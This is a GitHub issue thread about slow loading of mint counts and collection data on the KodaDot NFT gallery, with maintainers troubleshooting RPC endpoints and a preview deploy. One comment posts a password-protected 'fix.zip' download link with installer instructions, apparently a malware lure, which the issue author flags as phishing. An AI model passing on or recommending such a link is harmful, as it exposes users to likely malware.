### ISSUE TITLE
Mint count doesnt work // is too slow to load

### ISSUE THREAD

**Issue by damskyftw** [kodadot/nft-gallery#10904]
### What happened?

.

### Please reproduce in steps

.

### Expected Behavior

.

### What browsers are you seeing the problem on?

Chrome

### At which address did you encounter bug?

kodadot.xyz

### Are you logged in?

None

### Screenshots

<img width="1479" alt="Screenshot 2024-08-26 at 9 20 28" src="https://github.com/user-attachments/assets/524cfa5f-22cb-4720-aee1-e52295f9f5e2">

### Payment link for reward

https://canary.kodadot.xyz/dot/transfer/?target=<My_Polkadot_Address_check_https://github.com/kodadot/nft-gallery/blob/main/REWARDS.md#creating-your-dot-address>

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by damskyftw** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

possible fishing attempt, careful

**Comment by preschian** [comment]
@damskyftw Currently, the data is taken from on-chain data. If it takes a long time to fetch the data, there's a possibility that when you mint the drops, it will also take a long time, like this: https://github.com/kodadot/nft-gallery/issues/10663. I created this page: https://polkadot-endpoint.pages.dev/ to check which endpoint is the fastest in polkadot-assethub. Try opening that page and provide me with a screenshot when you visit it

**Comment by damskyftw** [comment]
> @damskyftw Currently, the data is taken from on-chain data. If it takes a long time to fetch the data, there's a possibility that when you mint the drops, it will also take a long time, like this: #10663. I created this page: https://polkadot-endpoint.pages.dev/ to check which endpoint is the fastest in polkadot-assethub. Try opening that page and provide me with a screenshot when you visit it

<img width="1064" alt="image" src="https://github.com/user-attachments/assets/2d0e5656-c6f6-46c9-bdb0-0fb78555acef">

**Comment by damskyftw** [comment]
> Are you using VPN ?

No

**Comment by damskyftw** [comment]
Doesnt matter whether its minted out or not. This has been 30 sec to load the collection preview 

and 3 more minutes to load the collect information. I feel like it’s not related to chain, but some front-end bug, dno

<img width="1476" alt="image" src="https://github.com/user-attachments/assets/9c27d657-593a-4c6f-be91-72ae2cbb0bdd">

**Comment by preschian** [comment]
> <img width="1064" alt="image" src="https://github.com/user-attachments/assets/2d0e5656-c6f6-46c9-bdb0-0fb78555acef">
> 

fyi currently on assethub we are using parity endpoint. based on your screenshot its not the fastest one

@damskyftw in the meantime, could you check the drops page with this PR https://deploy-preview-10903--koda-canary.netlify.app/. provide the screenshot which section is not loaded on your side

**Comment by damskyftw** [comment]
> @damskyftw in the meantime, could you check the drops page with this PR https://deploy-preview-10903--koda-canary.netlify.app/. provide the screenshot which section is not loaded on your side

This loads properly and fairly fast
